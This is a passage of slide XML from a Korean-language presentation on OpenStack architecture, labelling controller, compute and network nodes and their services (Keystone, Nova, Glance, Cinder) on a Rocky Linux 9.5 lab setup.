          <a:xfrm>
            <a:off x="760323" y="6441117"/>
            <a:ext cx="31171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모든 요청의 진입점이자 두뇌 역할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4349801" y="1591056"/>
            <a:ext cx="3495751" cy="5266944"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 114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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587545" y="359084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4587545" y="441380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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587545" y="5226711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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4349801" y="6123280"/>
            <a:ext cx="3476549" cy="514807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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358945" y="7111289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20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4630979" y="6441117"/>
            <a:ext cx="31171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CPU/Memory 자원 제공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8128102" y="1591056"/>
            <a:ext cx="3495751" cy="5266944"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 114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Shape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8365846" y="359084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23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8365846" y="441380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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8365846" y="523676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Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8186166" y="6131759"/>
            <a:ext cx="3476549" cy="514807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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8137246" y="7111289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Text 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8316925" y="6437833"/>
            <a:ext cx="31171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지속성(Persistence) 보장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181405" y="3715207"/>
            <a:ext cx="8101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Keystone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181405" y="3943807"/>
            <a:ext cx="104058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인증 및 권한 관리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181405" y="4538167"/>
            <a:ext cx="6291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Glance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Text 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181405" y="4766767"/>
            <a:ext cx="94549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VM 이미지 관리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162202" y="5361127"/>
            <a:ext cx="8101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Nova-API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1162202" y="5589727"/>
            <a:ext cx="96469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컴퓨트 제어 API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4959706" y="3715207"/>
            <a:ext cx="1239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Nova-Compute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4959706" y="3943807"/>
            <a:ext cx="130759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VM 라이프사이클 관리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4977994" y="4538167"/>
            <a:ext cx="10863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Libvirt / KVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4977994" y="4766767"/>
            <a:ext cx="121158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하이퍼바이저 가상화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4961535" y="5402275"/>
            <a:ext cx="12481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Security Group</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Text 44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4961535" y="5680544"/>
            <a:ext cx="124998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iptables 방화벽 규칙</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text 45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8718804" y="3715207"/>
            <a:ext cx="1239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Cinder-Volume</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8718804" y="3943807"/>
            <a:ext cx="124998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블록 스토리지 서비스</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Text 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8756294" y="4538167"/>
            <a:ext cx="9436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LVM / Ceph</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8756294" y="4766767"/>
            <a:ext cx="97383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스토리지 백엔드</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8775497" y="5361127"/>
            <a:ext cx="11814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Swift (Option)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Text 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8775497" y="5589727"/>
            <a:ext cx="108813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오브젝트 스토리지</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580644" y="1600200"/>
            <a:ext cx="3476549" cy="57607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6" name="Shape 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580644" y="3353105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55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="1828800"/>
            <a:ext cx="609905" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 37481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  <a:effectLst>
            <a:outerShdw blurRad="139700" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="22D3EE">
                <a:alpha val="1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58" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-90" r="-90"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="923544" y="1981505"/>
            <a:ext cx="381305" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="2572207"/>
            <a:ext cx="1991563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Controller Node</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text 57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="2933395"/>
            <a:ext cx="31199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8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 및 오케스트레이션</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Image 1" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933602" y="3859682"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62" name="Image 2" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933602" y="4682642"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Image 3" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect t="-1100" b="-1100"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="933602" y="5505602"/>
            <a:ext cx="114300" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358945" y="1600200"/>
            <a:ext cx="3476549" cy="57607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6" name="Shape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358945" y="3353105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7" name="Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587545" y="1828800"/>
            <a:ext cx="609905" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 37481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  <a:effectLst>
            <a:outerShdw blurRad="139700" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="818CF8">
                <a:alpha val="1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68" name="Image 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40250" y="1981505"/>
            <a:ext cx="304495" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587545" y="2572207"/>
            <a:ext cx="1867205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Compute Node</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587545" y="2933395"/>
            <a:ext cx="31199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C7D2FE">
                    <a:alpha val="8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워크로드 실행 환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Image 6" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4711903" y="3859682"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="72" name="Image 7" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect l="-837" r="-837"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4711903" y="4682642"/>
            <a:ext cx="152705" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="Image 9" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4721504" y="5536152"/>
            <a:ext cx="133502" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8137246" y="1600200"/>
            <a:ext cx="3476549" cy="57607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="34D39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6" name="Shape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8137246" y="3353105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7" name="Shape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8365846" y="1828800"/>
            <a:ext cx="609905" cy="609905"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 37481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  <a:effectLst>
            <a:outerShdw blurRad="139700" dist="12700" dir="16200000" algn="bl" rotWithShape="0">
              <a:srgbClr val="34D399">
                <a:alpha val="1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78" name="Image 10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518550" y="1981505"/>
            <a:ext cx="304495" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="Text 66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8365846" y="2572207"/>
            <a:ext cx="1696212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Network</a:t>
            </a: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Node</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Text 67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8365846" y="2933395"/>
            <a:ext cx="31199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FFFFFF">
                    <a:alpha val="80000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Noto Sans KR" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans KR" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>네트워크 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Image 11" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect t="-1100" b="-1100"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8490204" y="3859682"/>
            <a:ext cx="114300" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82" name="Image 12" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect l="-837" r="-837"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8490204" y="4682642"/>
            <a:ext cx="152705" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83" name="Image 13" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId14">
            <a:alphaModFix amt="80000"/>
          </a:blip>
          <a:srcRect l="-1507" r="-1507"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8490204" y="5505602"/>
            <a:ext cx="171907" cy="133502"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 1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2485E6-3D9E-D5FD-FBA9-A1D3E19E2A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" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="381305"/>
            <a:ext cx="761695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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="523951"/>
            <a:ext cx="3381451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OpenStack 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상세 정보</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1591056"/>
            <a:ext cx="3495751" cy="4885639"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 114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809244" y="359084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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="441380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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809244" y="523676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583692" y="6131759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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4349801" y="1591056"/>
            <a:ext cx="3495751" cy="4885639"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 114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1" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358945" y="7111289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23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8365846" y="4413809"/>
            <a:ext cx="3019349" cy="676656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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8137246" y="7111289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Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952347" y="3843298"/>
            <a:ext cx="2876246" cy="50932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RHEL </a:t>
            </a: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계열의 보안성과 클라우드 최적화</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938174" y="4523537"/>
            <a:ext cx="2401248" cy="56692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Rocky LInux Selinux</a:t>
            </a:r>
          </a:p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	+</a:t>
            </a:r>
          </a:p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Bobcat RBAC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938174" y="5512786"/>
            <a:ext cx="2048408" cy="55229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최신 </a:t>
            </a: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Python </a:t>
            </a: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및 라이브러리</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968494" y="3848709"/>
            <a:ext cx="2255012" cy="14447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OS: </a:t>
            </a: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로키 리눅스 </a:t>
            </a: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9.5</a:t>
            </a:r>
          </a:p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Ram: 12gb</a:t>
            </a:r>
          </a:p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용량</a:t>
            </a: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200gb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4961534" y="4713275"/>
            <a:ext cx="1650322" cy="18745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IP : 172.16.0.131</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580644" y="1600200"/>
            <a:ext cx="3476549" cy="57607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6" name="Shape 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580644" y="3353105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9" name="Text 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760323" y="1828800"/>
            <a:ext cx="2615979" cy="33375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Openstack Bobcat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Shape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358945" y="1600200"/>
            <a:ext cx="3476549" cy="57607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6" name="Shape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4358945" y="3353105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9" name="Text 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4586325" y="1828800"/>
            <a:ext cx="3019349" cy="33375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Co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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ntroller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Node</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Network Node</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8137246" y="3353105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" y="2192681"/>
            <a:ext cx="1310504" cy="1096544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
